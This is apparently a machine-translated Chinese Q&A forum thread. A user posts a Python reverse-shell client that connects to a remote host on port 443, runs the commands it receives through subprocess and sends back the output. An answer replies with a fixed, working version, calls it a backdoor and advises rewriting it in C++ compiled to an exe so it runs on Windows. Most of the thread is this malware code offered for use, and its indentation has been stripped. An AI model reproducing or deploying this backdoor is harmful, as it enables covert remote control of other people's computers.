/ *
嘿,这个脚本纯粹是为了好玩,不是非法的,除了它易于停止和检测。如果我将它用于非法活动,为什么我会在这里发布?* /
我的问题是我无法从客户端执行cmd命令。我不知道为什么虽然我有一个提示,它与某种套接字错误有关。当我尝试执行命令时,无论我等待多久,它都无能为力。客户端没有任何问题,因为我已经使用下面的代码更简单的版本对其进行了测试。
import getpass
import socket
import subprocess
username = getpass.getuser()
host = socket.gethostbyname('IP here')
port = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
def start():
conntrue = None
while conntrue is None:
try:
conntrue = s.connect((host, port))
s.send("[+] We are connected to %s") % (username)
while True:
try:
exec_code = s.recv(1024)
if exec_code == "quit":
break
elif exec_code == "Hey":
try:
proc = subprocess.Popen("MsgBox " + username + " Hey", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
s.send(stdout_value)
except:
s.send("[+] was wrong, just exec it manually")
else:
proc = subprocess.Popen(exec_code, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
s.send(stdout_value)
except:
s.close()
except:
conntrue = None
pass
s.close()
start()
答案 0 :(得分:0)
在这里,这是一个从您的客户端获取shell的工作代码。我怀疑你无论如何都能使用这个非法的东西,python不适用于后门。您应该考虑使用C ++这种代码,因为它不仅速度快,而且可以编译成exe。而python需要python解释器,因此无法在Windows上运行(除非你得到py2exe)。
import getpass
import socket
import subprocess
username = getpass.getuser()
host = socket.gethostbyname('')
port = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection = None
while connection is None:
try:
connection = s.connect((host, port))
s.send("[+] We are connected to %s" % username)
while True:
try:
exec_code = s.recv(1024)
if exec_code == "quit":
break
else:
proc = subprocess.Popen(exec_code, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
s.send(stdout_value)
except Exception, err:
print err
except Exception, e:
print e
s.close()
尽量不要使用除了自己使用except Exception,variable来查找代码中的错误然后替换为裸的除外。